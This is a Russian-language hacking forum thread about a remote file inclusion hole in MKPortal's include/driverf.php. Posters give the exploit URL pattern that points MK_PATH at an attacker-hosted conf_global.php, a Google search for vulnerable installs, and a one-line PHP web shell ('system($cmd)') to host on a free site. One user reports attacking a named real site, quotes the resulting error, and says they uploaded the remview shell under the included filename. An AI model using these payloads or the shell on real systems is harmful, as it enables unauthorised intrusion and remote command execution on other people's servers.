|
внимание! в 1.0.1а это уже исправили
файл http://[target]/mkportal/include/driverf.php содержит что-то вроде </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">require $MK_PATH."/conf_global.php";[/QUOTE]<span id='postcolor'> эксплойт: http://[target]/mkporta....TH=http где: http://[hacker_site]/conf_global.php любой php код http://www.google.ru/search?....%BA&lr= |
пхп-шная инъекция ?
Довольно частый случай: http://www.site.ru/index.php&se=сайт_с_кодом&cmd=К оманды |
Хотелось бы добавить, что "сайтом с кодом" может являться любой сайт на народе со страничкой следующего содержания:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> <PRE> <H4> <? system($cmd); ?> </H4> </PRE> [/QUOTE]<span id='postcolor'> Н-р: http://www.shutnicok.narod.ru/xak.php |
кстати как видно из запроса в google
этот движок неплохо распостранился интересно сколько на народе вот таких сайтов с загадочными файлами *.php =) |
Блин, пишет вот что:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Fatal error: main(): Failed opening required 'http://hack-user.narod.ru/conf_global.php' (include_path='.:') in /membri/galassia/mkportal/include/driverf.php on line 20[/QUOTE]<span id='postcolor'> |
А запрос делаю такой:
http://galassia.altervista.org/mkporta....TH=http |
и ещё я загрузил remview на narod и переименовал в conf_global.php
|
| Время: 20:58 |